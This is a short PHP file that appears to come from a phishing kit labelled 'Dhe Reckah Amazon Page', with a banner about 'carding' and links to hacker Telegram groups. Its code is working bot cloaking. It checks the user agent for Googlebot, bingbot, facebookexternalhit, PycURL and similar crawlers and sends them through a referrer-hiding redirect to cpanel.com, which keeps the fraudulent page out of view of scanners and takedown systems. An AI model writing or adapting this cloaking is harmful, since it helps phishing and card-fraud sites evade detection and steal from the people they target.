<?php
//error_reporting(E_ALL ^ E_NOTICE);
/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/

	if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Java') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'FreeBSD') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler')  
		or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) {
                  exit(header("Location: https://utilify.me/hide-referrer/http://www.cpanel.com"));
		  
		      die();
	}

	if ($_SERVER['HTTP_USER_AGENT'] == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {

			  exit(header("Location: https://utilify.me/hide-referrer/http://www.cpanel.com"));
		      die();
    }

?>